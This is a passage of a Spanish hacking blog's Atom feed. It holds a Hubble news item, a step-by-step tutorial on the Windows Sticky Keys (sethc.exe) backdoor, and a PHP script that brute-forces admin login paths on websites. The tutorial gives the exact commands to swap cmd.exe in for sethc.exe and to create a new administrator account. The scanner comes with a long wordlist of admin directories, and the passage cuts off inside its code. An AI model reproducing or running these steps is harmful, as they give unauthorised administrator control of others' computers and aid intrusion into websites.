src="http://static.betazeta.com/www.fayerwayer.com/up/2010/07/hubble-estrella2-570x456.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;Después de que se encontrara ayer una estrella más grande de lo que se  creía que podría existir, la NASA informó hoy que el Hubble encontró una  estrella que se mueve a hipervelocidad y está siendo expulsada de la  Vía Láctea a 2,5 millones de kilómetros por hora.&lt;br /&gt;&lt;br /&gt;La velocidad es tres veces mayor a la que tiene nuestro sol en su órbita  por la galaxia. La pregunta ahora es:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: red;"&gt;¿por qué se mueve tan rápido?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;La elaborada teoría de la NASA es que hace unos 100 millones de años, un  sistema de tres estrellas probablemente se acercó demasiado al centro  de la galaxia, y un hoyo negro se tragó una de ellas. El momentum  (impulso) de la estrella capturada se transfirió a las otras dos,  haciendo que se dispararan violentamente fuera del centro. A medida que  avanzaban a alta velocidad, la más grande de las dos absorbió a la otra,  creando la bola de gas azul hiperrápida que captó el Hubble ahora.&lt;br /&gt;&lt;br /&gt;Esta teoría intenta responder a una serie de interrogantes.&lt;br /&gt;&lt;br /&gt;De acuerdo a su distancia del centro de la Vía Láctea (a unos 200.000  años luz), los astrónomos sugieren que la estrella tiene 100 millones de  años, sin embargo, como es una gigante azul y tiene una gran masa,  debería haber vivido tan sólo 20 millones de años antes de consumirse.  La capacidad del Hubble de medir la trayectoria de la estrella confirma  que viene del centro de la Vía Láctea, lo que lleva a suponer que obtuvo  el tamaño y color después, al fusionarse dos estrellas.&lt;br /&gt;&lt;br /&gt;Seguir a este sol podría dar a los investigadores algunas pistas de cómo  se forman las galaxias y como la materia oscura influencia a los  cuerpos celestes.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt; &lt;b&gt;&lt;span style="font-size: large;"&gt;&lt;span style="color: red;"&gt;Fuente: FayerWayer&amp;nbsp;       &lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-1299439006620423339?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/1299439006620423339/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/07/telescopio-hubble-descubre-estrella.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/1299439006620423339'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/1299439006620423339'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/07/telescopio-hubble-descubre-estrella.html' title='Telescopio Hubble descubre estrella superveloz que se aleja de la galaxia'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-48593868307750317</id><published>2010-07-25T10:39:00.000-07:00</published><updated>2010-07-25T23:01:48.685-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Papers'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Bugs'/><title type='text'>Fallo de seguridad en sethc.exe</title><content type='html'>&lt;div style="color: red;"&gt;&lt;b&gt;0x001&amp;nbsp; StickyKeys&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;0x002 Sistemas afectados&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;0x003 Aprovechamiento del fallo&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;0x004 Escalada de privilegios&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;0x001: SickyKeys&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;StickyKeys: Es una opcion de accesibilidad de Windows. Se produce al presionar teclas en algun orden logico (como puede ser presionar cinco veces la tecla shift). Al presionar esta tecla cinco veces, nuestra maquina emite un "BIP" y se ejecuta el proceso sethc.exe&lt;br /&gt;&lt;br /&gt;Aca les dejo una web con algunas caracteristicas sobre el uso de StickyKeys&lt;br /&gt;Click &lt;a href="http://docs.sun.com/app/docs/doc/801-7479/6i1pkb85s?l=es&amp;amp;a=view"&gt;AQUI &lt;/a&gt;para acceder a la web.&lt;br /&gt;&lt;br /&gt;Aqui les dejo una imagen de la ventana de StickYKeys (que se produce al presionar cinco veces la tecla shift como bien habiamos dicho)&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img828.imageshack.us/img828/6663/50295492.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="168" src="http://img828.imageshack.us/img828/6663/50295492.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;0x002 Sistemas Afectados&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;No estoy seguro, pero creo que este proceso puede ser ejecutado en:&lt;br /&gt;&lt;br /&gt;Windows NT&lt;br /&gt;Windows XP (SP1, SP2)&amp;nbsp;&amp;nbsp; ----&amp;gt; En el SP3 el agujero de seguridad fue parcheado&lt;br /&gt;Windows Vista&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;0x003 Aprovechando el Fallo&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;Aqui llega la parte mas entretenida que muchos estaban esperando con ansias. La pregunta seria..&lt;br /&gt;&lt;br /&gt;¿Como podemos usar este proceso para nuestro beneficio?&lt;br /&gt;Muy simple, que tal si les dijera que cada vez que presionemos cinco veces la tecla shift se les abriera una prompt de comandos (cmd.exe) con privilegios de Administrador ?&lt;br /&gt;¿Estaria estupendo no?&lt;br /&gt;&lt;br /&gt;Bueno, nos situamos en nuestra cuenta limitada y presionamos cinco veces la tecla shift, y vemos si se activa el proceso sethc.exe, si se abre la ventana de StickyKeys ¡Eureca!. Podremos aprovechar el fallo.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img267.imageshack.us/img267/4020/48381263.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://img267.imageshack.us/img267/4020/48381263.jpg" width="289" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Screen del stickykeys con su respectivo proceso.&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;Bueno para hacer lo que dijimos mas arriba (eso de abrir el cmd presionando la tecla shift) lo haremos, copiando el archivo sethc.exe con otro nombre y copiando al cmd.exe con el nombre de sethc.exe&lt;/div&gt;&lt;br /&gt;el archivo sethc.exe se encuentra en: %windir%\system32\sethc.exe&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img691.imageshack.us/img691/2796/36741495.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="241" src="http://img691.imageshack.us/img691/2796/36741495.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;para hacer esto, vamos a nuestra querida consolita negra (inicio-&amp;gt;Ejecutar-&amp;gt;cmd.exe) y escribimos lo siguiente:&lt;br /&gt;&lt;br /&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;cd %windir%\system32&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;copy sethc.exe sethc_copia.exe&lt;/div&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;copy cmd.exe sethc.exe&lt;/div&gt;&lt;br /&gt;Ahora dejo una screen de como quedaria todo eso tecleado:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img687.imageshack.us/img687/5172/65109288.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="192" src="http://img687.imageshack.us/img687/5172/65109288.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Bueno y ahora cerramos el cmd.exe, presionamos 5 veces shift y taran! magicamente se nos abre una pantallita igual a la que cerramos.&lt;br /&gt;&lt;br /&gt;Aclaro que para hacer todo esto si tenemos una cuenta con privilegios limitados, es necesario reiniciar la pc apretar F8 y arrancar del modo consola.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img801.imageshack.us/img801/7375/81618596.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://img801.imageshack.us/img801/7375/81618596.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;0x004: Escalando Privilegios.&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;Ahora nos crearemos una cuenta Administradora de la computadora, en mi caso le pondre&lt;br /&gt;usuario: franco&lt;br /&gt;password: contrasenia&lt;br /&gt;&lt;br /&gt;Todo esta tarea de añadir a administradores y crear la cuenta lo hare del PROMPT de comandos.&lt;br /&gt;&lt;br /&gt;Una vez que tenemos abierta la consola (apretando cinco veces shift) teclearemos lo siguiente:&lt;br /&gt;&lt;br /&gt;&lt;div style="background-color: #666666; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;net user usuario password /add /expires:never&lt;/div&gt;Que en mi caso seria&lt;br /&gt;net user franco contrasenia /add /expires:never&lt;br /&gt;&lt;br /&gt;Con este comando ya tenemos una cuenta de usuario, ahora le daremos privilegios de administrador con el siguiente comando&lt;br /&gt;&lt;br /&gt;&lt;div style="background-color: #666666; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;net localgroup Administradores franco /add&lt;/div&gt;&lt;br /&gt;Listo ya tenemos nuestra cuenta con privilegios de admin :)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img202.imageshack.us/img202/5152/78858550.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="198" src="http://img202.imageshack.us/img202/5152/78858550.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Espero que les haya gustado, cualquier duda/critica ya saben dejen un comentario o mandenme un mail.&lt;br /&gt;&lt;br /&gt;&lt;b style="font-family: Verdana,sans-serif;"&gt;&lt;span style="color: red;"&gt;By Dr [F]&lt;/span&gt;&lt;/b&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-48593868307750317?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/48593868307750317/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/07/fallo-de-seguridad-en-sethcexe.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/48593868307750317'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/48593868307750317'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/07/fallo-de-seguridad-en-sethcexe.html' title='Fallo de seguridad en sethc.exe'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-3909447843389121519</id><published>2010-07-21T16:33:00.000-07:00</published><updated>2010-07-28T00:30:19.749-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='PHP'/><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>Admin panel Finder</title><content type='html'>Hola gente, aca les dejo un pequeño script que desarolle en php, para encontrar el panel de administracion de un sitio web, el script consta de dos paginas (indexx.html y adminp.php)&lt;br /&gt;&lt;br /&gt;Bueno sin mas preambulos les dejo el codigo:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="background-color: white; color: red; text-align: center;"&gt;&lt;b&gt;indexx.htm&lt;/b&gt;&lt;/div&gt;&lt;div style="background-color: white; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&lt;/div&gt;&lt;div style="background-color: white; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&lt;/div&gt;&lt;div style="background-color: white; color: black; font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444;"&gt;&amp;lt;html&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444;"&gt;&amp;lt;head&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444;"&gt;&amp;lt;link rel="stylesheet" href="estilos.css" type="text/css"&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444;"&gt;&amp;lt;title&amp;gt;Admin Panel Finder&amp;lt;/title&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444;"&gt;&amp;lt;/head&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444;"&gt;&amp;lt;body&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444;"&gt;&amp;lt;center&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444;"&gt;&amp;lt;c&amp;gt;[&amp;lt;/c&amp;gt;&amp;lt;t&amp;gt;B&amp;lt;/t&amp;gt;&amp;lt;c&amp;gt;]&amp;lt;/c&amp;gt;&amp;lt;t&amp;gt;B&amp;lt;/t&amp;gt;&amp;lt;in&amp;gt; i&amp;lt;/in&amp;gt;&amp;lt;c&amp;gt;&amp;nbsp; [&amp;lt;/c&amp;gt;&amp;lt;t&amp;gt;S&amp;lt;/t&amp;gt;&amp;lt;c&amp;gt;]&amp;lt;/c&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444;"&gt;&amp;lt;/center&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444;"&gt;&amp;lt;font face="Comic Sans Ms"&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444;"&gt;&amp;lt;center&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444;"&gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444;"&gt;&amp;lt;form method="post" action="adminp.php"&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444;"&gt;Ingrese la web:&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444;"&gt;&amp;lt;input type="text" name="web" value="www.example.com.ar" size="30"&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444;"&gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444;"&gt;&amp;lt;input class="botonsubmit" type="submit" value="Go !"&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444;"&gt;&amp;lt;/center&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444;"&gt;&amp;lt;/font&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444;"&gt;&amp;lt;/form&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444;"&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444;"&gt;&amp;lt;!-- Gracias al foro www.foro.elhacker.net.. una gran comunidad ! --!&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444;"&gt;&lt;span style="background-color: #444444; color: black;"&gt;&amp;lt;/html&amp;gt;&lt;/span&gt;&lt;span style="background-color: #444444; color: black;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;adminp.php&lt;/b&gt;&lt;/div&gt;&lt;div style="background-color: white;"&gt;&lt;br /&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;lt;html&amp;gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;lt;head&amp;gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;lt;title&amp;gt; Admin Panel Finder Dr [F] &amp;lt;/title&amp;gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;lt;/head&amp;gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;lt;!-- Estilo de admin panel --!&amp;gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;lt;body style="cursor: crosshair;"&amp;gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;lt;center&amp;gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;lt;font face="Courier New"&amp;gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;lt;h1&amp;gt;&amp;lt;font color=red&amp;gt;[&amp;lt;/font&amp;gt;&amp;lt;b&amp;gt;!&amp;lt;/b&amp;gt;&amp;lt;font color=red&amp;gt;]&amp;lt;/font&amp;gt; Panel Finder &amp;lt;font color=red&amp;gt;[&amp;lt;/font&amp;gt;&amp;lt;b&amp;gt;!&amp;lt;font color=red&amp;gt;]&amp;lt;/font&amp;gt;&amp;lt;/h1&amp;gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;lt;font face="Comic Sans MS"&amp;gt;&amp;lt;h3&amp;gt;By&amp;lt;/h4&amp;gt;&amp;lt;font color=red&amp;gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;lt;h2&amp;gt;Dr &amp;lt;font color=red&amp;gt;[&amp;lt;/font&amp;gt;&amp;lt;b&amp;gt;&amp;lt;font color=black&amp;gt;F&amp;lt;/font&amp;gt;&amp;lt;/b&amp;gt;&amp;lt;font color=red&amp;gt;]&amp;lt;/font&amp;gt;&amp;lt;/h1&amp;gt;&amp;lt;/font&amp;gt;&amp;lt;/font&amp;gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;lt;br&amp;gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;lt;/center&amp;gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;lt;?php&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;$pagina=$_REQUEST['web'];&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;$target = $pagina;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;$array= array(&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;nbsp;'admin/','ADMIN/','paneldecontrol/','login/','adm/','cms/',&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;'admon/','ADMON/','administrador/','administrator/','admin/login.php',&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;'ADMIN/login.php','admin/home.php','admin/controlpanel.html','admin/controlpanel.php',&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;"admin1.php", "admin1.html", "admin2.php", "admin2.html", "yonetim.php", "yonetim.html", "yonetici.php", "yonetici.html", "ccms/", "ccms/login.php", "ccms/index.php", "maintenance/", "webmaster/", "adm/", "configuration/", "configure/", "websvn/", "admin/", "admin/account.php", "admin/account.html". "admin/index.php", "admin/index.html", "admin/login.html", "admin/home.php", "admin/controlpanel.html", "admin/controlpanel.php", "admin.php", "admin.html", "admin/cp.php", "admin/cp.html", "cp.php", "cp.html", "administrator/", "administrator/index.html", "administrator/index.php", "administrator/login.html", "administrator/login.php", "administrator/account.html", "administrator/account.php", "administrator.php", "administrator.html", "login.php", "login.html", "modelsearch/login.php", "moderator.php", "moderator.html", "moderator/login.php", "moderator/login.html", "moderator/admin.php", "moderator/admin.html", "moderator/", "account.php", "account.html", "controlpanel/", "controlpanel.php", "controlpanel.html", "admincontrol.php", "admincontrol.html", "adminpanel.php", "adminpanel.html", "admin1.asp", "admin2.asp", "yonetim.asp", "yonetici.asp", "admin/account.asp", "admin/index.asp", "admin/login.asp", "admin/home.asp", "admin/controlpanel.asp", "admin.asp", "admin/cp.asp", "cp.asp", "administrator/index.asp", "administrator/login.asp", "administrator/account.asp", "administrator.asp", "login.asp", "modelsearch/login.asp", "moderator.asp", "moderator/login.asp", "moderator/admin.asp", "account.asp", "controlpanel.asp", "admincontrol.asp", "adminpanel.asp", "fileadmin/", "fileadmin.php", "fileadmin.asp", "fileadmin.html", "administration/", "administration.php", "administration.html", "sysadmin.php", "sysadmin.html", "phpmyadmin/", "myadmin/", "sysadmin.asp", "sysadmin/", "ur-admin.asp", "ur-admin.php", "ur-admin.html", "ur-admin/", "Server.php", "Server.html", "Server.asp", "Server/", "wp-admin/", "administr8.php", "administr8.html", "administr8/", "administr8.asp", "webadmin/", "webadmin.php", "webadmin.asp", "webadmin.html", "administratie/", "admins/", "admins.php", "admins.asp", "admins.html", "administrivia/", "Database_Administration/", "WebAdmin/", "useradmin/", "sysadmins/", "admin1/", "system-administration/", "administrators/", "pgadmin/", "directadmin/", "staradmin/", "ServerAdministrator/", "SysAdmin/", "administer/", "LiveUser_Admin/", "sys-admin/", "typo3/", "panel/", "cpanel/", "cPanel/", "cpanel_file/", "platz_login/", "rcLogin/", "blogindex/", "formslogin/", "autologin/", "support_login/", "meta_login/", "manuallogin/", "simpleLogin/", "loginflat/", "utility_login/", "showlogin/", "memlogin/", "members/", "login-redirect/", "sub-login/", "wp-login/", "login1/", "dir-login/", "login_db/", "xlogin/", "smblogin/", "customer_login/", "UserLogin/", "login-us/", "acct_login/", "admin_area/", "bigadmin/", "project-admins/", "phppgadmin/", "pureadmin/", "sql-admin/", "radmind/", "openvpnadmin/", "wizmysqladmin/", "vadmind/", "ezsqliteadmin/", "hpwebjetadmin/", "newsadmin/", "adminpro/", "Lotus_Domino_Admin/", "bbadmin/", "vmailadmin/", "Indy_admin/", "ccp14admin/", "irc-macadmin/", "banneradmin/", "sshadmin/", "phpldapadmin/", "macadmin/", "administratoraccounts/", "admin4_account/", "admin4_colon/", "radmind-1/", "Super-Admin/", "AdminTools/", "cmsadmin/", "SysAdmin2/", "globes_admin/", "cadmins/", "phpSQLiteAdmin/", "navSiteAdmin/", "server_admin_small/", "logo_sysadmin/", "server/", "database_administration/", "power_user/", "system_administration/", "ss_vms_admin_sm/"&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;);&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: black;"&gt;&lt;span style="background-color: #444444; font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444; color: 